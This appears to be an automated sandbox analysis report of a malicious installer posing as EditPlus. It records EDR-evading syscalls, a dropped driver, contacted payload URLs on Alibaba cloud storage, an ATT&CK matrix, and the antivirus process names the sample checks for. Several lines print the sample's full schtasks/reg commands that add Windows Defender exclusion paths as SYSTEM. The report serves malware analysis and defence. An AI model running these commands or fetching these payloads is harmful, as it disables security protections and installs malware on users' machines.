Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCode function: 41_2_00B52AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_00B52AE2
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCode function: 41_2_00B510CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_00B510CC
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCode function: 41_2_00B551FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00B551FB

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\0b1G0H.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeNtProtectVirtualMemory: Indirect: 0x2A2B253Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeNtProtectVirtualMemory: Indirect: 0x2B0B253Jump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeNtDelayExecution: Indirect: 0x1FA0DAJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Program Files (x86)\NEiV2V\NEiV2V.exe "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A52FD40 cpuid 4_2_00007FFE1A52FD40
Source: C:\Users\user\Documents\0b1G0H.exeCode function: GetLocaleInfoA,4_2_000000014000F370
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: GetLocaleInfoA,40_2_00986B1A
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCode function: GetLocaleInfoA,41_2_00B56B1A
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_000000014000A370
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_0000000140005A70
Source: C:\Users\user\Desktop\138745635-72645747.116.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: 0b1G0H.exe, 00000004.00000002.2145299227.00000000028D8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,4_2_00000001400042B0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter		33
Windows Service		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory4
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts11
Scheduled Task/Job		11
Scheduled Task/Job		1
Access Token Manipulation		2
Obfuscated Files or Information		Security Account Manager224
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts12
Service Execution		1
Registry Run Keys / Startup Folder		33
Windows Service		1
DLL Side-Loading		NTDS1
Query Registry		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
Process Injection		32
Masquerading		LSA Secrets231
Security Software Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
Scheduled Task/Job		1
Modify Registry		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		111
Virtualization/Sandbox Evasion		DCSync111
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591652 Sample: 138745635-72645747.116.exe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 73 vien3h.oss-cn-beijing.aliyuncs.com 2->73 75 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 2->75 77 5 other IPs or domains 2->77 85 Suricata IDS alerts for network traffic 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 Antivirus detection for dropped file 2->89 91 8 other signatures 2->91 9 0b1G0H.exe 26 2->9         started        14 138745635-72645747.116.exe 1 5 2->14         started        16 0b1G0H.exe 2->16         started        18 14 other processes 2->18 signatures3 process4 dnsIp5 81 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49755, 49776 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->81 63 C:\Program Files (x86)63EiV2V\tbcore3U.dll, PE32 9->63 dropped 65 C:\Program Files (x86)65EiV2V65EiV2V.exe, PE32 9->65 dropped 103 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->103 105 Found direct / indirect Syscall (likely to bypass EDR) 9->105 20 NEiV2V.exe 4 5 9->20         started        25 cmd.exe 1 9->25         started        27 cmd.exe 1 9->27         started        35 2 other processes 9->35 83 sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.17, 443, 49730, 49731 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->83 67 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->67 dropped 69 C:\Users\user\Documents\vselog.dll, PE32+ 14->69 dropped 71 C:\Users\user\Documents\0b1G0H.exe, PE32+ 14->71 dropped 107 Drops PE files to the document folder of the user 14->107 109 Sample is not signed and drops a device driver 14->109 111 Tries to detect virtualization through RDTSC time measurements 14->111 113 Uses cmd line tools excessively to alter registry or file data 18->113 29 reg.exe 1 1 18->29         started        31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        37 5 other processes 18->37 file6 signatures7 process8 dnsIp9 79 8.217.35.253, 50018, 8917 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->79 59 C:\Program Files (x86)\...\tbcore3U.dll, PE32 20->59 dropped 61 C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe, PE32 20->61 dropped 93 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->93 95 Creates an undocumented autostart registry key 20->95 39 cmd.exe 20->39         started        97 Uses cmd line tools excessively to alter registry or file data 25->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 25->99 41 conhost.exe 25->41         started        43 schtasks.exe 1 25->43         started        51 2 other processes 25->51 45 conhost.exe 27->45         started        53 3 other processes 27->53 101 Adds extensions / path to Windows Defender exclusion list (Registry) 29->101 47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        55 6 other processes 35->55 file10 signatures11 process12 process13 57 conhost.exe 39->57         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
138745635-72645747.116.exe15%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\NEiV2V\tbcore3U.dll100%AviraTR/Redcap.vdzex
C:\Program Files (x86)\2I9luTPI\tbcore3U.dll100%AviraTR/Redcap.vdzex
C:\Program Files (x86)\NEiV2V\tbcore3U.dll100%Joe Sandbox ML
C:\Program Files (x86)\2I9luTPI\tbcore3U.dll100%Joe Sandbox ML
C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe0%ReversingLabs
C:\Program Files (x86)\NEiV2V\NEiV2V.exe0%ReversingLabs
C:\Users\user\Documents\0b1G0H.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://www.editplus.com/PublisherES-ComputingUninstallStringDisplayName0%Avira URL Cloudsafe
https://www.editplus.com/kr0%Avira URL Cloudsafe
https://www.editplus.com/0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/i.datZ0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://www.editplus.com.Congratulations0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://vien3h.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
118.178.60.9
truefalse
    		high
    sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
    		39.103.20.17
    		truefalse
      		unknown
      ikhhya.net
      		unknown
      		unknownfalse
        		unknown
        vien3h.oss-cn-beijing.aliyuncs.com
        		unknown
        		unknownfalse
          		unknown
          22mm.oss-cn-hangzhou.aliyuncs.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://vien3h.oss-cn-beijing.aliyuncs.com/s.datfalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
              		high
              https://vien3h.oss-cn-beijing.aliyuncs.com/a.giffalse
              • Avira URL Cloud: safe
              		unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
                		high
                https://vien3h.oss-cn-beijing.aliyuncs.com/c.giffalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                  		high
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
                    		high
                    https://vien3h.oss-cn-beijing.aliyuncs.com/b.giffalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
                      		high
                      https://vien3h.oss-cn-beijing.aliyuncs.com/i.datfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://vien3h.oss-cn-beijing.aliyuncs.com/d.giffalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://vien3h.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.thawte.com/ThawteTimestampingCA.crl0138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 0b1G0H.exe.0.drfalse
                          		high
                          http://www.symauth.com/rpa00138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drfalse
                            		high
                            http://ocsp.thawte.com0138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 0b1G0H.exe.0.drfalse
                              		high
                              https://www.editplus.com.Congratulations138745635-72645747.116.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.editplus.com/138745635-72645747.116.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://vien3h.oss-cn-beijing.aliyuncs.com/i.datZ138745635-72645747.116.exe, 00000000.00000003.1904098242.0000000000595000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.editplus.com/kr138745635-72645747.116.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.symauth.com/cps0(138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drfalse
                                		high
                                https://www.editplus.com/PublisherES-ComputingUninstallStringDisplayName138745635-72645747.116.exefalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                39.103.20.17
